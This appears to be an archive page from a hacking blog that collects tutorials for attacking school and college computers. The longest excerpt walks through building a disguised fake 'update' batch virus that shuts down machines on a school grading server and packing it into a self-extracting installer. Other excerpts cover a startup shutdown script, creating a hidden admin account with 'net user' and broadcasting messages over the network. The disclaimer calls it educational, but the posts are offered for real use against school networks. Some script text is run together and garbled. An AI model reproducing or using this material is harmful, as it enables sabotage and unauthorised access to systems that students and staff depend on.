Find


Archive for the 'Hacking at School and College' Category

 

Breaking the Restrictions of the Administrator

Jun 29, 2008 in Hacking Tutorials, Hacking at School and College, Hardcore Hacking, Windows Hacking

Hello Friends many of you have come with this problem of hacking the Administrator in Windows XP. So her is the Solution to your problem. This works on Win 2000 & Win XP.
This can be used to gain access to the website you want to for free, and how you can gain access to ‘control […]

Popularity: 40% [?]

⇥ Read the article in full

No Comments »

School Network Hacking

Jun 23, 2008 in Bad Boy, Hacking at School and College, Hardcore Hacking

How to become Admin on your school Network. This way works for most schools.
Howdy Everyone
This tutorial is for those newbies out there, wanting to “hack” their school.
Im gonna start by saying, if your going to hack the school, theres a high probability your get caught, and dont do anything dumb like deleting the network. Its […]

Popularity: 32% [?]

⇥ Read the article in full

No Comments »

Shut down your School!!

Mar 18, 2008 in Hacking Computer, Hacking at School and College, Windows Hacking




Step 4
They grow up so fast — real fast!This script will infect any teacher that uses STI with the shutdown command. The little viral babies will copy themselves to the user’s hard drive and remain there.

@echo offcd C:\WINDOWSEcho STI must update itself, this will only take a few seconds.pauseEcho Please wait while the files install.move ?:\$\shutdown.batmove ?:\$\Update.regmove ?:\$\cure.exemove ?:\$\cure.exemove ?:\$\cure.batmove ?:\$\remove.batEcho Adding information to registry.pausestart regedit.exe Update.regcd ?:\$start real.exeexit
Now this one has to be in exe form. So save it as virus.bat, then compile it in Quick Batch File Compiler. You can get QuickBFC here: QuickBFC and download this file as a template for QuickBFC to work with. Just save the compiled file over this one.

Step 5
The CureThis is a little tool that can fix all damage done by your virus, it works in the same way that the virus works, but works to correct the problem rather than create it.
@echo off
shutdown -acd C:\WINDOWSdel shutdown.bat

Save as cure.bat

@echo offcd ?:\$del !.execd C:\move ?:\$\real.exeren C:\real.exe !.execd ?:\$move C:\?.execd C:\WINDOWS
Now download this file: http://www.mutantsrus.com/cure.exe

Step 6
The SetupNo it’s not the name of a heist movie. It is simply a SFX file that extracts all the files to their proper places and places the replicator in the STI drive.I am going to use WinRAR to do this. You can get WinRAR here: http://www.rarlab.com. First gather all the files you have made thus far. The files should be shutdown.bat, Update.reg, virus.exe, cure.exe, cure.bat, remove.bat and global.bat. Now select them all and put them in a .rar file. Then open Winrar and go to “tools”, then select “convert archive to SFX”. Click “Advanced SFX Options” In the field labeled Path to Extract, type C:\WINDOWS In the field labeled Run After Extraction, type C:\WINDOWS\global.bat Save the finished file anywhere you want and as any name. To install the virus, just run this program on a computer at school that is connected to the server that has the grading program on it (such as any computer in the Comp Lab.)

Popularity: 94% [?]

-->

This article is for only educational purpose, i am not responsible for any misuse of this article.

By using the following command you can shutdown your school or college by using only Note pad.
This is the main command that will be launched upon startup.
Type this in Notepad.
@echo offshutdown.exe -s -t 10 -c
“You have been hacked!”
Save […]

Popularity: 94% [?]

⇥ Read the article in full

No Comments »

Adding/Modifying User Accounts

Sep 03, 2007 in Hacking Tutorials, Hacking at School and College, Windows Hacking

Now that you have a command prompt, you can add a new user (ie yourself) like so
C:>net user username /ADD
where username is the name of your new account. And remember, try and make it look inconspicuous, then they’ll just think its a student who really is at school, when really, the person doesn’t EXIST! IF […]

Popularity: 4% [?]

⇥ Read the article in full

No Comments »

Sending messages out over the network

Sep 03, 2007 in Hacking at School and College

Okay, here’s how to send crazy messages to everyone in your school on a computer. In your command prompt, type
Net Send * “The server is h4×0r3d”
*Note: may not be necessary, depending on how many your school has access too. If it’s just one, you can leave it out*
Where is, replace it with […]

Popularity: 17% [?]

⇥ Read the article in full

No Comments »